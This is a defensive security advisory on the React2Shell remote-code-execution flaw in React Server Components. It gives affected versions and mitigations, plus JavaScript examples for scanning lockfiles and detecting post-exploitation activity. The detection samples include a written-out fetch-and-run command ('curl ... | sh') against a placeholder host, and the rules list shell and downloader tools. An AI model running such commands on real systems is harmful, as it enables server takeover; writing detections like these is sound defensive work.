CVE-2025-55182, also known as React2Shell, is a critical unauthenticated remote-code-execution vulnerability in React Server Components (RSC) that allows attackers to execute arbitrary code on the backend server by sending a specially crafted web request to a vulnerable React or Next.js application.
The issue affects the core React server rendering pipeline and does not require authentication or user interaction. If a vulnerable application is exposed to the internet, it can be exploited directly.
Technical details
React Flight is the wire format React Server Components use to serialize data between the client and the server. The server-side Flight deserializer in the affected packages did not sufficiently validate the payload it receives from the client, so attacker-controlled input in a crafted request can be resolved into server-side code paths and executed. Because the deserialization happens before any application-level authentication runs, the result is unauthenticated remote code execution.
Affected versions:
- react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0
- react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
- Next.js applications using the App Router prior to patched releases
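A quick way to confirm whether a deployment carries one of the listed versions is to scan its lockfile. The script below is an added example, not code from the original advisory or from the React project: it walks a parsed package-lock.json (the "packages" map of lockfileVersion 2/3, or the nested "dependencies" tree of lockfileVersion 1) and reports any react-server-dom-* entry whose version is in the affected set. SAMPLE_LOCK is constructed for illustration; the file-loading path and the exact-match list are assumptions, so take the authoritative fixed versions from the React advisory rather than from this list.

```javascript
// Added example, not from the original advisory or the React project.
// Scans a parsed package-lock.json for react-server-dom-* packages at the
// versions the advisory lists as affected. SAMPLE_LOCK is constructed.

const RSC_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);

// Affected versions from the advisory ("19.0" normalised to "19.0.0").
const AFFECTED_VERSIONS = new Set(["19.0.0", "19.1.0", "19.1.1", "19.2.0"]);

// Strip range operators and pad "19.0" -> "19.0.0" so set lookups are exact.
function normalizeVersion(v) {
  const clean = String(v).trim().replace(/^[=^~v]+/, "");
  const parts = clean.split(".");
  while (parts.length < 3) parts.push("0");
  return parts.join(".");
}

// The package name is everything after the last "node_modules/" in a
// lockfile path; this keeps scoped names such as "@scope/name" intact.
function nameFromLockPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? lockPath : lockPath.slice(idx + marker.length);
}

// Returns [{ name, version, where }] for every affected entry found.
function findVulnerable(lock) {
  const hits = [];
  const consider = (name, version, where) => {
    if (!RSC_PACKAGES.has(name)) return;
    const v = normalizeVersion(version);
    if (AFFECTED_VERSIONS.has(v)) hits.push({ name, version: v, where });
  };

  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path, "" is the root.
    for (const [p, meta] of Object.entries(lock.packages)) {
      if (p === "") continue;
      consider(meta.name || nameFromLockPath(p), meta.version, p);
    }
  } else if (lock.dependencies) {
    // lockfileVersion 1: nested tree, recurse into each package's deps.
    const walk = (deps, prefix) => {
      for (const [name, meta] of Object.entries(deps)) {
        const where = `${prefix}node_modules/${name}`;
        consider(name, meta.version, where);
        if (meta.dependencies) walk(meta.dependencies, `${where}/`);
      }
    };
    walk(lock.dependencies, "");
  }
  return hits;
}

// Constructed sample lockfile: one top-level and one nested affected copy,
// plus a turbopack entry at a version that is not on the affected list.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/react": { version: "19.2.0" },
    "node_modules/react-dom": { version: "19.2.0" },
    "node_modules/react-server-dom-webpack": { version: "19.2.0" },
    "node_modules/legacy-widget/node_modules/react-server-dom-parcel": { version: "19.1.1" },
    "node_modules/react-server-dom-turbopack": { version: "19.2.1" },
  },
};

// Usage: node check-rsc-lock.js [path/to/package-lock.json]
// Without a path it runs against SAMPLE_LOCK. Returns the number of hits.
function main() {
  const lockPath = process.argv[2];
  const lock = lockPath
    ? JSON.parse(require("node:fs").readFileSync(lockPath, "utf8"))
    : SAMPLE_LOCK;
  const hits = findVulnerable(lock);
  if (hits.length === 0) {
    console.log("No affected react-server-dom-* versions found");
  } else {
    for (const h of hits) console.log(`AFFECTED ${h.name}@${h.version} at ${h.where}`);
  }
  return hits.length;
}
main();
```

Two caveats when running this against a real tree. First, a lockfile check only covers packages installed through npm; Next.js ships its own bundled copies of the RSC runtime inside the next package, so a Next.js App Router application can be affected without any react-server-dom-* entry appearing in the lockfile, and the fix is to upgrade next itself. Second, the lockfile describes what will be installed, not what is running; for deployed containers, inspect the image or the running node_modules directory rather than the repository.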
Attack vector:
Crafted HTTP requests to the endpoints that accept React Server Component (Flight) payloads. The request body abuses the Flight serialization format so that the server deserializes attacker-supplied data into executable code. Successful exploitation gives code execution with the privileges of the Node.js process serving the application, without any prior foothold.
Precondition:
The application must be running a vulnerable React Server Component implementation and its RSC endpoints must be reachable by the attacker, which for most deployments means internet-facing. No authentication, valid session, or user interaction is required.
Evidence of exploitation
Security researchers confirm that active exploitation began within hours of public disclosure. Large-scale automated scanning targeting exposed React and Next.js applications has been observed globally.
Multiple confirmed breaches have already occurred across SaaS platforms, fintech, logistics, education, and government-adjacent infrastructure. Intelligence reporting also links early-stage exploitation to China-linked threat actors, as well as opportunistic access-broker and cybercriminal activity.
This exploitation pattern closely mirrors the early stages of the Log4Shell vulnerability in terms of speed, automation, and global reach. On December 11, CISA added CVE-2025-55182 to its list of Known Exploited Vulnerabilities (KEV).
Risk & Impact assessment
The risk of exploitation is high to critical due to:
- Unauthenticated remote code execution
- Public proof-of-concept exploits
- Mass automated scanning
- Active real-world exploitation
Impact if exploited:
Attackers gain full control of the application server process, which typically exposes cloud credentials, API keys, database connection strings, and other secrets held in environment variables or instance metadata. That access enables unauthorized database access, deployment of webshells and persistent backdoors, and lateral movement into internal networks for further compromise.
Organizations running public-facing React or Next.js infrastructure should treat this as a direct server takeover risk, not merely a data exposure issue.
Preventive Measures
Patch now:
Upgrade all affected react-server-dom-* packages and Next.js applications to patched releases immediately. Next.js bundles its own copy of the RSC runtime, so upgrading the next package is required even when no react-server-dom-* dependency appears in your lockfile. Rebuild container images and redeploy every affected service after patching; a patched lockfile does nothing for images already running in production.
Isolate & restrict:
Where an application does not need to be public, place it behind a VPN or an authenticating reverse proxy and enforce strict firewall and security-group rules. Treat WAF or reverse-proxy filtering of RSC requests as a stopgap that buys time to patch, not as a substitute for the upgrade.
Rotate credentials & keys:
Assume that any instance that was internet-facing while unpatched during the exploitation window may have been compromised. Check those hosts for webshells and other persistence before rotating, then rotate application secrets, service tokens, API keys, and cloud credentials; rotating on a host that is still backdoored only hands the attacker the new values.
Monitor:
Increase monitoring at three layers: at the edge, for unusual requests to server-rendering and server-action endpoints; on the host, for shell or downloader processes spawned by Node.js; and on the network, for outbound connections from web servers to destinations they do not normally contact.
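The host and network signals above translate directly into detection rules. The block below is an added example, not code from the original advisory: it runs two rules over constructed JSON process-exec and socket-connect events of the kind an EDR or eBPF sensor emits (the field names, the list of node binaries, and the egress allowlist are assumptions). It deliberately does not model the request payload itself, since the advisory does not describe it; it catches the post-exploitation behaviour instead.

```javascript
// Added example, not from the original advisory. Two detection rules for
// post-exploitation behaviour of a compromised Node.js web server, run
// over constructed sensor events. Field names are assumptions.

const NODE_BINARIES = new Set(["node", "nodejs"]);
const SHELLS = new Set(["sh", "bash", "dash", "zsh"]);
const DOWNLOADERS = new Set(["curl", "wget"]);

// Destinations the app legitimately talks to (assumed: database and cache).
const EGRESS_ALLOWLIST = new Set(["10.0.0.5:5432", "10.0.0.9:6379"]);

// Rule 1: a Node.js process directly spawning a shell or downloader.
function detectShellFromNode(ev) {
  if (ev.type !== "exec" || !NODE_BINARIES.has(ev.parent_comm)) return null;
  if (!SHELLS.has(ev.comm) && !DOWNLOADERS.has(ev.comm)) return null;
  return {
    rule: "node_spawned_shell",
    pid: ev.pid,
    detail: `${ev.parent_comm}(${ev.ppid}) -> ${ev.argv.join(" ")}`,
  };
}

// Rule 2: a Node.js process connecting to a destination not on the allowlist.
function detectAbnormalEgress(ev) {
  if (ev.type !== "connect" || !NODE_BINARIES.has(ev.comm)) return null;
  const dest = `${ev.daddr}:${ev.dport}`;
  if (EGRESS_ALLOWLIST.has(dest)) return null;
  return { rule: "node_unexpected_egress", pid: ev.pid, detail: `${ev.comm}(${ev.pid}) -> ${dest}` };
}

const RULES = [detectShellFromNode, detectAbnormalEgress];

// Parse each JSON line, apply every rule, and collect the alerts it raises.
function runDetections(lines) {
  const alerts = [];
  for (const line of lines) {
    let ev;
    try {
      ev = JSON.parse(line);
    } catch {
      continue; // malformed line: skip rather than abort the whole run
    }
    for (const rule of RULES) {
      const alert = rule(ev);
      if (alert) alerts.push({ ts: ev.ts, ...alert });
    }
  }
  return alerts;
}

// Constructed sample: normal startup and DB traffic, then a shell spawned
// from the web process that fetches a script, then a callback to the same
// host (203.0.113.0/24 is a documentation range, not a real indicator).
const SAMPLE_EVENTS = [
  '{"ts":"2025-12-04T10:00:00Z","type":"exec","pid":4101,"ppid":4100,"parent_comm":"bash","comm":"node","argv":["node","server.js"]}',
  '{"ts":"2025-12-04T10:00:02Z","type":"connect","pid":4101,"comm":"node","daddr":"10.0.0.5","dport":5432}',
  '{"ts":"2025-12-04T10:07:13Z","type":"exec","pid":4188,"ppid":4101,"parent_comm":"node","comm":"sh","argv":["sh","-c","curl -s http://203.0.113.7/a.sh | sh"]}',
  '{"ts":"2025-12-04T10:07:15Z","type":"connect","pid":4101,"comm":"node","daddr":"203.0.113.7","dport":4444}',
  "not json",
];

for (const a of runDetections(SAMPLE_EVENTS)) {
  console.log(`[${a.ts}] ${a.rule} pid=${a.pid} ${a.detail}`);
}
```

Scope the first rule to runtime process trees: build and install steps (npm scripts, postinstall hooks) legitimately spawn shells from node, so run it against the serving container or the PID namespace of the web process, not the CI runner. The second rule is the one that still fires when the attacker stays inside JavaScript and never forks a shell, because the stolen credentials or the reverse connection still have to leave the box; keep its allowlist tight and review it after every infrastructure change.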
Stay Safe. Stay Secure.
OP Innovate Research Team